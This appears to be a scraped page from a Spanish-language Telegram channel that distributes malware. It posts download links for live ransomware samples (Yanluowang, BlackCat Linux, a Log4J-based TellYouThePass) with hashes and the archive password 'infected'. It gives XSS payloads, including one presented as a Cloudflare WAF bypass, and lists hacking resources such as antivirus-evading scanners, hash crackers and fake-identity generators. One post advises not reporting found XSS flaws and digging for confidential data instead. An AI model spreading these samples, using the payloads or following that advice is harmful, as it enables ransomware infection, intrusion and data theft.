Malware X
198 subscribers
412 photos
22 videos
196 files
462 links
The largest collection of malware source code, samples, and papers on the internet.

98,000,000 of all kind of Virus.

Hosted by Pr@fEsOr X
Download Telegram
Please open Telegram to view this post
VIEW IN TELEGRAM
49d828087ca77abc8d3ac2e4719719ca48578b265bbb632a1a7a36560ec47f2d.zip
194.8 KB
Ransomware Yanluowang
..........................................
Utilizado en ataques corporativos dirigidos este malware, denominado ransomware Yanluowang (que lleva el nombre de una deidad china Yanluo Wang, uno de los diez reyes del infierno), se basa en la extensión que agrega a los archivos cifrados en los sistemas comprometidos.

SAMPLE MALWARE
👇👇👇👇👇👇👇👇
FileHash-SHA256. d11793433065633b84567de403c1989640a07c9a399dd2753aaf118891ce791c

FileHash-SHA256. 49d828087ca77abc8d3ac2e4719719ca48578b265bbb632a1a7a36560ec47f2d

FileHash-SHA256. 2c2513e17a23676495f793584d7165900130ed4e8cccf72d9d20078e27770e04
******************************

PASSWORD: infected

#malware #ransomware #x25hackingnews
Forwarded from Deleted Account
BlackCat_Linux_Ransom.7z
1.2 MB
BlackCat Ransomware Linux variant.
°°°°°°°°°°°°°°°°°
x32: 843001980e5073c7f0ea8b56873246b8

x64: 79fea7f741760ea21ff655137af05bd0

#blackcat #ransomware #x25hackingnews
LOG4J RAMSOMWARE
👇👇👇👇👇👇👇👇👇
Ya tiene un mes más o menos que traigo este ejemplo que me enviaron unos amigos para su análisis.

Este usa el nuevo bug de LOG4J. Este es esponsable de revivir una cepa de ransomware que ha estado inactiva durante los últimos dos años. TellYouThePass no se ha encontrado en la naturaleza desde julio de 2020, pero ahora ha reaparecido y es una de las amenazas de ransomware más activas que utilizan Log4J.

Este malware contiene un exploit unido que hace uso de LOG4J.
°°°°°°°°°°°°°°
DESCAGAR
👇👇👇👇👇
Log4J Malware.7z
6.1 MB
Pwd: infected
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from Deleted Account
Aqui un PAYLOAD XSS para cuando tengan donde practicar y no se acepten los mas básicos
*****************************
<pre id=p style=background:#000><svg onload='setInterval(n=>{for(o=t++,i=476;i--;o+=i%30?("0o"[c=0|(h=v=>(M=Math).hypot(i/30-8+3*M.sin(t/8/v),i%30/2-7+4*M.cos(t/9/v)))(7)*h(9)*h(6)/32]||".").fontcolor(c>2):"\n");p.innerHTML=o},t=1)'>
******************************
Forwarded from ӉѦСҠіИԌ ҬЄѦӍ СѦИѦL ѺҒіСіѦL DіҒԱՏіóИ
[Exploit Databases]
http://www.exploit-db.com/
http://www.intelligentexploit.com
http://www.shodanhq.com/
http://packetstormsecurity.com/


[Vulnerabilities Database]
https://cve.mitre.org/cve/
http://www.cvedetails.com/
https://nvd.nist.gov/
http://osvdb.org/
https://www.kb.cert.org/vuls/
https://secunia.com/community/advisories/search/
https://buildsecurityin.us-cert.gov/swa/...-databases
https://www.blackducksoftware.com/soluti...curity/nvd
http://www.securityfocus.com/bid
http://lwn.net/Vulnerabilities/
https://www.owasp.org/index.php/OWASP_Vu...ry_Project
http://denimgroup.com/resources-threadfix/
http://www.vulnerability-lab.com
http://www.secdocs.org/

[Hacking Tutorials]
https://www.offensive-security.com/
http://www.kalitutorials.net/2013/08/kali-linux.html
https://www.youtube.com/user/DEFCONConference
https://www.youtube.com/user/Hak5Darren
https://www.youtube.com/user/sansinstitute
https://en.wikibooks.org/wiki/Metasploit/VideoTutorials
http://www.hacking-tutorial.com/
http://breakthesecurity.cysecurity.org/
http://www.securitytube.net/
http://www.ehacking.net/
https://vimeo.com/channels/fullscopesecurity
http://www.spacerogue.net/wordpress/

[Virus Scan]
https://www.virustotal.com/
http://anubis.iseclab.org/
http://virusscan.jotti.org/it
--Not distribute to AV--
http://v2.scan.majyx.net/?page=home
http://fuckingscan.me/
https://anonscanner.com/
http://nodistribute.com/
http://www.file2scan.net/

[Tools Download]
http://tools.kali.org/tools-listing
http://insecure.org/
http://www.hackersonlineclub.com/hacking-tools
https://www.concise-courses.com/hacking-tools/
http://www.darknet.org.uk/category/hacking-tools/
http://www.kitploit.com/
http://www.toolswatch.org/
http://www.blackarch.org/tools.html
https://pentest-tools.com/reconnaissance/google-hacking
https://gexos.github.io/Hacking-Tools-Repository/
http://www.romhacking.net/utilities/

[Network Online Tools]
http://www.yougetsignal.com/
http://www.dnswatch.info/
http://www.nirsoft.net/countryip/
http://www.tcpiputils.com/
http://www.coffer.com/mac_find/
http://bgp.he.net/
http://www.sockets.com/services.htm
http://services.ce3c.be/ciprg/

[IP Lookup]
http://ip-api.com/#
http://www.my-ip-neighbors.com/
http://www.whatismyip.com/
http://www.ip2location.com/demo
http://freegeoip.net/static/index.html
http://whatstheirip.com
http://ipaddress.com
http://www.ip-adress.com/ipaddresstolocation/

[Encrypt / Decrypt ]
http://crypo.in.ua/tools/
http://www.tools4noobs.com/online_tools/decrypt/
http://codebeautify.org/encrypt-decrypt
http://encryption.online-toolz.com/tools...yption.php
http://textmechanic.com/Encryption-Generator.html
http://www.yellowpipe.com/yis/tools/encrypter/

[Online Hash Crackers]
http://www.hashkiller.co.uk/
http://www.md5online.org/
http://www.cmd5.org/
http://www.md5crack.com/
http://www.netmd5crack.com/cracker/
http://md5decryption.com/
http://md5.rednoize.com/
http://www.md5this.com/index.php
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
https://hdb.insidepro.com/en
https://crackstation.net/
http://www.cloudcracker.net/
https://isc.sans.edu/tools/reversehash.html
http://www.onlinehashcrack.com/ [$]
http://hashcrack.in/en [$]

[File Upload]
https://mega.co.nz/
https://www.mediafire.com/
https://infotomb.com/m/welcome
http://sharesend.com/
http://www.wss-coding.com/upload
http://zippyshare.com/
http://filetolink.com/
http://ge.tt/
http://largedocument.com/
http://rghost.net/
http://dox.abv.bg/files/share
http://secureupload.eu/
[Anonymous Test]
http://ipleak.net/
https://www.dnsleaktest.com/
https://diafygi.github.io/webrtc-ips/

[Tor Exit Node Check]
http://5deqglhxcoy3gbx6.onion - Xenobite
http://tmkloc6vhxos3nde.onion

[SMS]
http://receive-sms-now.com/
http://www.receive-sms-online.info/
http://www.receivesmsonline.net/

[Fake Identity]
http://www.fakenamegenerator.com/
https://fakena.me/
http://names.igopaygo.com/people/fake_person
Forwarded from СүѣЄГՏЄСҬЄѦӍӉԱИҬЄГ
Hemos actualizado la colección maestra de VXUG. Ahora tenemos 1.500.000 muestras de malware disponibles para descargar. * Solo PE, ELF, ZIP / APK * Tamaño del bloque: 10,000 binarios * Se permite la descarga de archivos individuales Que tengas un buen año nuevo, saludos al 2022. Compruébalo aquí: https://vx-underground.org
Forwarded from Deleted Account
Foto de Owasp Xalapa Chapter Rodolfo Baz
RECUERDEN AMIGOS ESTO
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
SI ENCUENTRAS UN XSS NO LO REPORTES por qué quedará como baja peligrosidad, Mejor ve más adentro y trata de obtener:

👉 Ya sea un DOM
👉 Ver si existe un CSRF.
👉 Analizar si existen direcciones de correo electrónico
👉 Encontrar cualquier información confidencial.
-----------------------------------------
Esto al menos hará que la gravedad de tus informes pasen a ser de

ALTA.PELIGROSIDAD.
°°°°°°°°°°°°°°°°°°°

ESTE consejo les doy por qué Popeye el marino soy.
Forwarded from Deleted Account
How I bypass 403 cloudflare HTML injection to XSS ... 30 min test to bypass it

bypass final payload

<h1/%6f%6e/oNclicK=alert`hacked`>CLICK HERE

Share payload by @_Y000_
thanks
Forwarded from Deleted Account
Forwarded from Deleted Account
**> Sabian que en en la CVE del año 1999 hubo CVE-1999-1598 vulnerabiliades registradas y la ultima vulnerabilidad registrada fue:

-----------------------------------------
NT Domain DoS and Security Exploit with SAMBA Server
___________________________

**> En el año 2021 hubo 46109 +- y la utlima vulnerbilidad registrada de ese año fue:

--------------------------------
Invalid input sanitizing leads to reflected Cross Site Scripting (XSS) in ASUS RT-AC52U_B1 3.0.0.4.380.10931 can lead to a user session hijack.
-------------------------------
Forwarded from Deleted Account
**> En el año 2020 hubo 9999 vulnerabilidades registradas y la ultima fue:

---------------------------------
A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.0.1, iTunes for Windows 12.10.9. Processing a maliciously crafted text file may lead to arbitrary code execution.
---------------------------------

Si se dan cuenta entre el 2020 y 2021 hubo un aumento del casi 400% en vulnerabilidades.....

woooowwww y vamos por mas......